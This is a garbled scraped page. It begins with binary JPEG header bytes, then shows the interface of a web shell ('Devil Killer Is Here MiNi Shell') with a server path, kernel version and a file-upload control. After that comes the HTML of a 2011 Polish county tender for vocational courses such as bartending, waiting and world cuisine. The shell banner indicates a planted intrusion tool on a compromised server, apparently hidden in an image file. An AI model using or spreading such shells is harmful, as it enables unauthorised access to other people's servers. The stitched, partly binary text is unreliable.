JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110422/122765-N-2011.html

<p class="kh_header"><b>Brzesko: Kursy i doradztwo zawodowe w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 122765 - 2011; data zamieszczenia: 22.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy i doradztwo zawodowe w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja kursów i zajęć z doradztwa zawodowego w szkołach Ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Brzeski współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w podziale na następujące zadania:
Zadanie 1: Kurs barmański dla uczniów ZS w Czchowie.
Zadanie 2: Kurs kelnerski dla uczniów ZS w Czchowie.
Zadanie 3: Kurs kelnerski dla uczniów ZSP nr 2 w Brzesku.
Zadanie 4: Kurs kuchnie świata dla uczniów ZSP nr 2 w Brzesku.
Zadanie 5: Kurs fakturowania i obsługi kas fiskalnych dla ZSP nr 2 w Brzesku.
Zadanie 6: Kurs specjalista ds.  pozyskiwania funduszy unijnych dla ZS w Czchowie.
Zadanie 7: Kurs jak i w co inwestować żeby zarobić? dla ZS w Czchowie.
Zadanie 8: Kurs eksperymentalne nauczanie fizyki dla ZSP nr 2 w Brzesku.
Zadanie 9: Kurs doradztwo zawodowe dla ZS w Czchowie.
Zadanie 10: Kurs doradztwo zawodowe dla ZSP nr 2 w Brzesku.

Szczegółową specyfikację każdego kursu zawarto w załączniku nr 1 do SIWZ (Opis przedmiotu zamówienia).

Kursy realizowane są w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

2.	Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia:

1)	Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. Szczegółowy opis poszczególnych części zamówienia zawarto w załączniku nr 1 do SIWZ.
2)	Zamawiający dopuszcza możliwość realizacji części zamówienia przez Podwykonawcę.
3)	Ukończenie kursu musi być potwierdzone stosownym zaświadczeniem/certyfikatem potwierdzającym ukończenie kursu. 

4)	Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci:  dziennika zajęć, listy obecności uczestników kursu, oraz innych dokumentów jeśli wymaga tego specyfikacja kursu. 
5)	W przypadku niemożliwości ukończenia kursu przez uczestnika z przyczyny leżącej po jego stronie (tj. długotrwałej choroby, śmierci lub dobrowolnej rezygnacji) Wykonawca zamiast zaświadczenia o ukończeniu kursu przekaże Zamawiającemu wraz z listą obecności stosowne oświadczenie ze wskazaniem powodu przerwania kursu danego uczestnika.
6)	Wykonawca po zakończeniu kursu przekaże Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy:
a)	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu szkolenia,
program kursu oraz dziennik zajęć,
b)	potwierdzenia odbioru materiałów szkoleniowych,
c)	kopie wydanych zaświadczeń i certyfikatów oraz listę potwierdzającą ich odbiór przez uczestników.
7)	W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: 
a)	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b)	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c)	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Województwa Małopolskiego, logo projektu, logo powiatu brzeskiego, hasło promocyjne POKL. 
8)	Wykonawca może w trakcie przeprowadzania kursu korzystać z pomocy dydaktycznych będących własnością szkoły wyszczególnionych w specyfikacji - w załączniku nr 1 do SIWZ, przy czym odpowiada on za wszelkie uszkodzenia powstałe na wskutek niewłaściwego ich użytkowania. Dyrektor lub osoba przez niego upoważniona udostępnia sprzęt oraz dokonuje sprawdzenia jego stanu w obecności Wykonawcy każdorazowo przed rozpoczęciem i  po zakończeniu kursu. Pozostały sprzęt niezbędny do realizacji zadania Wykonawca musi zorganizować na swój koszt.
9)	Jeśli w opisie przedmiotu zamówienia - załącznik nr 1 do SIWZ określono podział na grupy to kurs musi zostać przeprowadzony dla każdej grupy oddzielnie i nie dopuszczalne jest łączenie grup celem prowadzenia wspólnych zajęć.
10)	Przed podpisaniem umowy Wykonawca przekaże Zamawiającemu planowany harmonogram spotkań wraz z terminem przeprowadzenia kursu. Szczegółowy harmonogram realizacji kursu musi być uzgodniony z liderem szkolnym projektu właściwym dla każdego zadania i podpisany przez właściwego Dyrektora Szkoły i Wykonawcę.
11)	Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych kursów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku,
Wydział Edukacji,
ul.Piastowska 2,
32-800 Brzesko,
pokój nr 59.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Brzesku,
ul.Głowackiego 51,
32-800 Brzesko,
sekretariat, pokój 213, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Modernizacja kształcenia zawodowego w Małopolsce.
Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.2, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Kurs barmański dla uczniów ZS w Czchowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów.
2.	Kurs jest wyjazdowy i realizowany w siedzibie Wykonawcy lub miejscu wyznaczonym przez Wykonawcę przystosowanym do przeprowadzenia kursu.
3.	Czas trwania kursu wynosi: 40 godzin (5 dni) w tym dziennie 7 godzin zajęć praktycznych i 1 godzina zajęć teoretycznych.
4.	Przedmiotem zamówienia jest organizacja kursu barmańskiego dla 15 uczniów Zespołu Szkół w Czchowie.
5.	Termin realizacji szkolenia: od daty podpisania umowy do 30 czerwca 2011r. według ustaleń z Zamawiającym. Szczegółowy harmonogram zostanie ustalony przed podpisaniem umowy z Wykonawcą.
6.	Wykonawca na swój koszt zapewnia transport 16 osób (tj. 15 uczestników kursu oraz 1 opiekuna) z parkingu przy Zespole Szkół w Czchowie do miejsca prowadzenia kursu oraz transport powrotny po zakończeniu całego kursu z miejsca prowadzenia kursu na parking ww szkoły. 
7.	Tematyka kursu zawierać powinna między innymi: Barman jako zawód (predyspozycje psycho - fizyczne,  savoir-vivre,  praca z klientem, organizacja pracy, ubiór barmana , itp ), Bar, jako miejsce pracy - podział barów, umeblowanie i wyposażenie - prezentacja naczyń szklanych i przyrządów pracy barmana, Podział alkoholi ( piwo, wino, wódki białe i gatunkowe, brandy, koniak, likiery, whisky ), Wpływ alkoholu na organizm człowieka, Podstawy miksologii: techniki miksowania i mieszania napojów, nauka pracy shakerami, rodzaje drinków, klasyfikacja koktajli, dodatki, składniki dekoracyjne, Drinki na bazie wódek, rumu, ginu, tequili i likierów, - sporządzanie i degustacja, Drinki na bazie alkoholi typu Cognac, brandy, winiak, whisky, Burbon, wino, wermuth, champagne, arrak, piwo - sporządzanie i degustacja, Proces produkcji, podział oraz temperatury serwowania szampanów i win musujących, koniaku, brandy oraz grapy, rumów, ginów, tequili, whisky szkockiej, whiskey amerykańskiej i irlandzkiej, piwa, wina - degustacja. Elementy obsługi kelnerskiej: organizacja pracy w restauracji, zasady estetyki, nakrywanie stołu, przenoszenie napojów na tacy,  - zajęcia praktyczne,  Kawa i herbata w barze. Nauka sporządzania drinków na bazie kawy ( obsługa ciśnieniowego ekspresu do kawy, zasady parzenia i serwowania kawy, drinki na bazie kawy ) - sporządzanie i degustacja,  Free style ( czym jest free style, zasady i techniki free style, pokaz free style ), Inscenizowanie nietypowych sytuacji, obsługa trudnego klienta, Egzamin. 
8.	Wykonawca zapewni uczestnikom materiały i produkty niezbędne do przeprowadzenia kursu, zwłaszcza produkty dla części praktycznej. 
9.	Wykonawca zapewni każdego dnia uczestnikom kursu i opiekunowi wyżywienie w postaci śniadania, obiadu (dwudaniowego) i kolacji ( wszystkie posiłki, serwowane wyporcjowane).
10.	Wykonawca ubezpieczy wszystkich uczestników kursu i opiekuna od następstw nieszczęśliwych wypadków (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu).
11.	Wykonawca zapewni uczestnikom kursu i opiekunowi nocleg w pokojach 1, 2 lub 3 osobowych z łazienką na okres trwania kursu.
12.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Kurs kelnerski dla uczniów ZS w Czchowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów.
2.	Czas trwania kursu wynosi: 40 godz. lekcyjnych, w tym zajęć praktycznych minimum 30 godz.
3.	Termin realizacji kursu: od dnia podpisania umowy do 30 czerwca 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół w Czchowie, ul.Sądecka 187, 32-860 Czchów od poniedziałku do piątku w godzinach od 14.00 do 18.00 oraz w soboty. 
4.	Tematyka kursu zawierać powinna między innymi: Przygotowanie do pracy -przygotowanie sali do przyjęcia gości, ubiór kelnera, kultura osobista, organizacja pracy, wyposażenie kelnera,  współpraca z innymi osobami pracującymi w lokalu, lojalność i uczciwość względem pracodawcy, Kompetencje - wiadomości i umiejętności jakie powinien posiadać kelner, Elementy zastawy stołowej i sztućców, Techniki kelnerskie - ćwiczenia (nakrywanie stołów - układ podstawowy, elegancki, okazjonalny ( np. walentynkowy, bożonarodzeniowy, wielkanocny), przenoszenie zastawy stołowej - dwa, trzy talerze w jednej ręce noszenie i podawanie potraw i napojów z tacy podawanie potraw na talerzach - serwis niemiecki serwowanie potraw z półmisków - serwis francuski zbieranie brudnych naczyń ze stołu), Zasady obsługi gości - ćwiczenia (kolejność obsługi - przyjęcie zamówienia, podawanie potraw, czynności wykonywane z prawej i lewej  strony, właściwy kierunek obsługi - zasady bezpieczeństwa), Obsługa konsumenta - ćwiczenia (powitanie gościa, wskazanie miejsca, podawanie menu przyjęcie zamówienia na aperitif, przyjęcie zamówienia właściwego, przyjęcie zamówienia na wino (właściwy dobór wina do potraw), otwieranie i serwowanie wina, podawanie dań i napojów do stolika, zbieranie brudnych naczyń ze stolika, przyjęcie zamówienia na desery, podanie deserów, przyjęcie zamówienia na kawę, herbatę, podanie rachunku, pożegnanie gościa), Organizacja bankietów (Imprezy zasiadanie, Imprezy stojące), Napoje i alkohole (podstawowe wiadomości z zakresu: wódka czysta, likiery, gin, Cognac, Whisky, Rum, Tequila szampan, wina - najważniejsze marki, sposoby podawania (temperatura, szkło),  charakterystyka smakowa, co mówią etykiety alkoholi, podstawowe wiadomości o kawie, rodzaje napojów kawowych, ćwiczenia praktyczne z obsługi ekspresu ciśnieniowego, pojęcie aperitif i degestif - zasady i przykłady zastosowania), Rozwiązywanie trudnych sytuacji - sposoby konwersacji, Egzamin.
5.	Wykonawca zapewni swój sprzęt szkoleniowy oraz materiały dydaktyczne dla każdego uczestnika szkolenia.
6.	Wykonawca zapewni ubezpieczenie wszystkich uczestników kursu od następstw nieszczęśliwych wypadków ( każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu).
7.	Wykonawca na swój koszt zapewni podczas każdego spotkania dla każdego uczestnika catering składający się z gorącego, jednodaniowego posiłku i gorących napojów ( kawa, herbata). 
8.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
9.	Zamawiający zapewnia: pracownię obsługi konsumenta, komplet sztućców dla 6 osób - 3 szt., komplet talerzy dla 6 osób - 3 szt., miski różnej wielkości - 6 szt., stolnica drewniana - 3 szt., taca - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Kurs kelnerski dla uczniów ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów.
2.	Czas trwania kursu wynosi: 60 godz. lekcyjnych, w tym zajęć praktycznych 40 godzin oraz zajęć teoretycznych 20 godz.
3.	Termin realizacji kursu: od lipca do 30 września 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul.Piastowska 2, 32-800 Brzesko od poniedziałku do piątku w godzinach od 14.00 do 18.00 oraz w soboty. 
4.	Tematyka kursu zawierać powinna między innymi: Przygotowanie do pracy -przygotowanie sali do przyjęcia gości, ubiór kelnera, kultura osobista,  organizacja pracy, wyposażenie kelnera,  współpraca z innymi osobami pracującymi w lokalu, lojalność i uczciwość względem pracodawcy, Kompetencje - wiadomości i umiejętności jakie powinien posiadać kelner, Elementy zastawy stołowej i sztućców, Techniki kelnerskie - ćwiczenia (nakrywanie stołów - układ podstawowy, elegancki, okazjonalny (np. walentynkowy, bożonarodzeniowy, wielkanocny), przenoszenie zastawy stołowej - dwa, trzy talerze w jednej ręce noszenie i podawanie potraw i napojów z tacy podawanie potraw na talerzach - serwis niemiecki serwowanie potraw z półmisków - serwis francuski zbieranie brudnych naczyń ze stołu), Zasady obsługi gości - ćwiczenia (kolejność obsługi - przyjęcie zamówienia, podawanie potraw, czynności wykonywane z prawej i lewej  strony, właściwy kierunek obsługi - zasady bezpieczeństwa), Obsługa konsumenta - ćwiczenia (powitanie gościa, wskazanie miejsca, podawanie menu przyjęcie zamówienia na aperitif, przyjęcie zamówienia właściwego, przyjęcie zamówienia na wino (właściwy dobór wina do potraw), otwieranie i serwowanie wina, podawanie dań i napojów do stolika, zbieranie brudnych naczyń ze stolika, przyjęcie zamówienia na desery, podanie deserów, przyjęcie zamówienia na kawę, herbatę, podanie rachunku, pożegnanie gościa), Organizacja bankietów (Imprezy zasiadanie, Imprezy stojące), Napoje i alkohole (podstawowe wiadomości z zakresu: wódka czysta, likiery, gin, Cognac, Whisky, Rum, Tequila szampan, wina - najważniejsze marki, sposoby podawania (temperatura, szkło),  charakterystyka smakowa, co mówią etykiety alkoholi, podstawowe wiadomości o kawie, rodzaje napojów kawowych, ćwiczenia praktyczne z obsługi ekspresu ciśnieniowego, pojęcie aperitif i degestif - zasady i przykłady zastosowania), Rozwiązywanie trudnych sytuacji - sposoby konwersacji, Egzamin.
5.	Wykonawca zapewni swój sprzęt szkoleniowy oraz materiały dydaktyczne dla każdego uczestnika szkolenia.
6.	Wykonawca zapewni ubezpieczenie wszystkich uczestników kursu od następstw nieszczęśliwych wypadków ( każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu).
7.	Wykonawca na swój koszt zapewni podczas każdego spotkania dla każdego uczestnika catering składający się z gorącego, jednodaniowego posiłku i gorących napojów ( kawa, herbata). 
8.	Wykonawca przeprowadzi wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu na podstawie formularza ankiety oceniającej.
9.	Zamawiający zapewnia: pracownię obsługi klienta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Kurs kuchnie świata dla uczniów ZSP nr 2 w Brzesku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów.
2.	Czas trwania kursu wynosi: 60 godz. lekcyjnych, w tym zajęć praktycznych 40 godzin oraz zajęć teoretycznych 20 godz.
3.	Termin realizacji kursu: od lipca do 30 września 2011 r. zajęcia odbywać się będą na ternie Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul.Piastowska 2, 32-800 Brzesko od poniedziałku do piątku w godzinach od 14.00 do 18.00 oraz w soboty. 
4.	Kurs musi uwzględniać w części teoretycznej: zapoznanie i przybliżenie uczestnikom podstawowych zasad kuchni innych krajów w aspekcie kulturowo-geograficznym oraz charakterystycznych dla nich surowców, sposobu ich przyrządzania i podawania. W części praktycznej kursu Wykonawca przygotuje wraz  uczestnikami wybrane potrawy kuchni świata. Wszystkie czynności mają być omawiane i demonstrowane przez instruktora, a następnie samodzielnie wykonywane przez uczestników kursu. Podczas każdych zajęć praktycznych wszyscy kursanci poznają receptury omawianych dań i napojów. Na każdych zajęciach praktycznych odbędzie się degustacja przygotowanych potraw.
5.	Wykonawca zapewni swój sprzęt szkoleniowy (istnieje możliwość wypożyczenia sprzętu szkolnego po uzgodnieniu z liderem szkolnym) oraz materiały i produkty niezbędne do przeprowadzenia kursu, między innymi świeże produkty żywnościowe dla części praktycznej oraz zeszyt w formacie A4, w twardej oprawie wraz z długopisem dla każdego uczestnika kursu.
6.	Wykonawca zapewni ubezpieczenie wszystkich uczestników kursu od następstw nieszczęśliwych wypadków ( każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu).
